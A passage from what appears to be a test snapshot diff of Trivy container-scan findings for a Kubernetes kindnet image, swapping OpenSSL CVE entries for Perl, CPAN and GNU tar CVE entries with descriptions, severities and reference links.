PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.", + "description": "CPAN 2.28 allows Signature Verification Bypass.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "double free after calling PEM_read_bio_ex", + "name": "perl-CPAN: Bypass of verification of signatures in CHECKSUMS files", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4450", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4450", + "value": "https://avd.aquasec.com/nvd/cve-2020-16156", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", + "value": "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "https://access.redhat.com/security/cve/CVE-2020-16156", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://ubuntu.com/security/notices/USN-5689-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://ubuntu.com/security/notices/USN-5689-2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-16156", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31484", + "installedVersion": "5.28.1-6+deb10u1", + "packageName": "perl-base", + "references": [ + "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", + "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", + "https://github.com/andk/cpanpm/pull/175", + "https://metacpan.org/dist/CPAN/changes", + "https://ubuntu.com/security/notices/USN-6112-1", + "https://ubuntu.com/security/notices/USN-6112-2", + "https://www.openwall.com/lists/oss-security/2023/04/18/14", + ], + }, + "category": "Vulnerability", + "description": "CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "CPAN.pm before 2.35 does not verify TLS certificates when downloading ...", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://avd.aquasec.com/nvd/cve-2023-31484", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://github.com/andk/cpanpm/pull/175", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://metacpan.org/dist/CPAN/changes", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://ubuntu.com/security/notices/USN-6112-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://ubuntu.com/security/notices/USN-6112-2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-4116", + "installedVersion": "5.28.1-6+deb10u1", + "packageName": "perl-base", + "references": [ + "http://www.openwall.com/lists/oss-security/2011/11/04/2", + "http://www.openwall.com/lists/oss-security/2011/11/04/4", + "https://access.redhat.com/security/cve/CVE-2011-4116", + "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", + "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", + "https://rt.cpan.org/Public/Bug/Display.html?id=69106", + "https://seclists.org/oss-sec/2011/q4/238", + "https://www.cve.org/CVERecord?id=CVE-2011-4116", + ], + }, + "category": "Vulnerability", + "description": "_is_safe in the File::Temp module for Perl does not properly handle symlinks.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "perl: File::Temp insecure temporary file handling", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://avd.aquasec.com/nvd/cve-2011-4116", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "http://www.openwall.com/lists/oss-security/2011/11/04/2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "http://www.openwall.com/lists/oss-security/2011/11/04/4", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://access.redhat.com/security/cve/CVE-2011-4116", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://rt.cpan.org/Public/Bug/Display.html?id=69106", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://seclists.org/oss-sec/2011/q4/238", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2011-4116", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31486", + "installedVersion": "5.28.1-6+deb10u1", + "packageName": "perl-base", + "references": [ + "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "https://github.com/chansen/p5-http-tiny/pull/153", + "https://hackeriet.github.io/cpan-http-tiny-overview/", + "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "https://www.openwall.com/lists/oss-security/2023/05/03/4", + "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", + ], + }, + "category": "Vulnerability", + "description": "HTTP::Tiny before 0.083, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "HTTP::Tiny before 0.083, a Perl core module since 5.13.9 and available ...", + "references": [ { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://avd.aquasec.com/nvd/cve-2023-31486", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", + "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4450.html", + "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + "value": "https://github.com/chansen/p5-http-tiny/pull/153", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + "value": "https://hackeriet.github.io/cpan-http-tiny-overview/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4450", + "value": "https://www.openwall.com/lists/oss-security/2023/05/03/4", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0215", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2005-2541", + "installedVersion": "1.30+dfsg-6", + "packageName": "tar", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2023-0215", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", - "https://github.com/advisories/GHSA-r7jw-wp68-3xch", - "https://linux.oracle.com/cve/CVE-2023-0215.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", - "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", - "https://security.netapp.com/advisory/ntap-20230427-0007/", - "https://security.netapp.com/advisory/ntap-20230427-0009/", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://ubuntu.com/security/notices/USN-5845-1", - "https://ubuntu.com/security/notices/USN-5845-2", - "https://www.cve.org/CVERecord?id=CVE-2023-0215", - "https://www.openssl.org/news/secadv/20230207.txt", + "http://marc.info/?l=bugtraq&m=112327628230258&w=2", + "https://access.redhat.com/security/cve/CVE-2005-2541", + "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", + "https://www.cve.org/CVERecord?id=CVE-2005-2541", ], }, "category": "Vulnerability", - "description": "The public API function BIO_new_NDEF is a helper function used for streaming -ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the -SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by -end user applications. - -The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter -BIO onto the front of it to form a BIO chain, and then returns the new head of -the BIO chain to the caller. Under certain conditions, for example if a CMS -recipient public key is invalid, the new filter BIO is freed and the function -returns a NULL result indicating a failure. However, in this case, the BIO chain -is not properly cleaned up and the BIO passed by the caller still retains -internal pointers to the previously freed filter BIO. If the caller then goes on -to call BIO_pop() on the BIO then a use-after-free will occur. This will most -likely result in a crash. - - - -This scenario occurs directly in the internal function B64_write_ASN1() which -may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on -the BIO. This internal function is in turn called by the public API functions -PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream, -SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7. - -Other public API functions that may be impacted by this include -i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and -i2d_PKCS7_bio_stream. - -The OpenSSL cms and smime command line applications are similarly affected. - - - -", + "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "use-after-free following BIO_new_NDEF", + "name": "tar: does not properly warn the user when extracting setuid or setgid files", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0215", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0215", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://avd.aquasec.com/nvd/cve-2005-2541", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "http://marc.info/?l=bugtraq&m=112327628230258&w=2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://access.redhat.com/security/cve/CVE-2005-2541", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://www.cve.org/CVERecord?id=CVE-2005-2541", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9923", + "installedVersion": "1.30+dfsg-6", + "packageName": "tar", + "references": [ + "http://git.savannah.gnu.org/cgit/tar.git/commit/?id=cb07844454d8cc9fb21f53ace75975f91185a120", + "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00077.html", + "http://savannah.gnu.org/bugs/?55369", + "https://access.redhat.com/security/cve/CVE-2019-9923", + "https://bugs.launchpad.net/ubuntu/+source/tar/+bug/1810241", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9923", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9923", + "https://ubuntu.com/security/notices/USN-4692-1", + "https://www.cve.org/CVERecord?id=CVE-2019-9923", + ], + }, + "category": "Vulnerability", + "description": "pax_decode_header in sparse.c in GNU Tar before 1.32 had a NULL pointer dereference when parsing certain archives that have malformed extended headers.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "tar: null-pointer dereference in pax_decode_header in sparse.c", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://avd.aquasec.com/nvd/cve-2019-9923", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "http://git.savannah.gnu.org/cgit/tar.git/commit/?id=cb07844454d8cc9fb21f53ace75975f91185a120", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00077.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "http://savannah.gnu.org/bugs/?55369", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://access.redhat.com/security/cve/CVE-2019-9923", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://bugs.launchpad.net/ubuntu/+source/tar/+bug/1810241", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9923", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9923", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://ubuntu.com/security/notices/USN-4692-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9923", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-20193", + "installedVersion": "1.30+dfsg-6", + "packageName": "tar", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-20193", + "https://bugzilla.redhat.com/show_bug.cgi?id=1917565", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20193", + "https://git.savannah.gnu.org/cgit/tar.git/commit/?id=d9d4435692150fa8ff68e1b1a473d187cc3fd777", + "https://nvd.nist.gov/vuln/detail/CVE-2021-20193", + "https://savannah.gnu.org/bugs/?59897", + "https://security.gentoo.org/glsa/202105-29", + "https://ubuntu.com/security/notices/USN-5329-1", + "https://www.cve.org/CVERecord?id=CVE-2021-20193", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the src/list.c of tar 1.33 and earlier. This flaw allows an attacker who can submit a crafted input file to tar to cause uncontrolled consumption of memory. The highest threat from this vulnerability is to system availability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "tar: Memory leak in read_header() in list.c", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://avd.aquasec.com/nvd/cve-2021-20193", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://access.redhat.com/security/cve/CVE-2021-20193", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1917565", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20193", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://git.savannah.gnu.org/cgit/tar.git/commit/?id=d9d4435692150fa8ff68e1b1a473d187cc3fd777", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20193", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://savannah.gnu.org/bugs/?59897", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://security.gentoo.org/glsa/202105-29", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://ubuntu.com/security/notices/USN-5329-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-20193", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-48303", + "installedVersion": "1.30+dfsg-6", + "packageName": "tar", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:0959", + "https://access.redhat.com/security/cve/CVE-2022-48303", + "https://bugzilla.redhat.com/2149722", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", + "https://errata.almalinux.org/9/ALSA-2023-0959.html", + "https://errata.rockylinux.org/RLSA-2023:0959", + "https://linux.oracle.com/cve/CVE-2022-48303.html", + "https://linux.oracle.com/errata/ELSA-2023-0959.html", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", + "https://savannah.gnu.org/bugs/?62387", + "https://savannah.gnu.org/patch/?10307", + "https://ubuntu.com/security/notices/USN-5900-1", + "https://ubuntu.com/security/notices/USN-5900-2", + "https://www.cve.org/CVERecord?id=CVE-2022-48303", + ], + }, + "category": "Vulnerability", + "description": "GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "heap buffer overflow at from_header() in list.c via specially crafted checksum", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://avd.aquasec.com/nvd/cve-2022-48303", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://access.redhat.com/errata/RHSA-2023:0959", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://access.redhat.com/security/cve/CVE-2022-48303", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", + "value": "https://bugzilla.redhat.com/2149722", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-r7jw-wp68-3xch", + "value": "https://errata.almalinux.org/9/ALSA-2023-0959.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0215.html", + "value": "https://errata.rockylinux.org/RLSA-2023:0959", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://linux.oracle.com/cve/CVE-2022-48303.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", + "value": "https://linux.oracle.com/errata/ELSA-2023-0959.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", + "value": 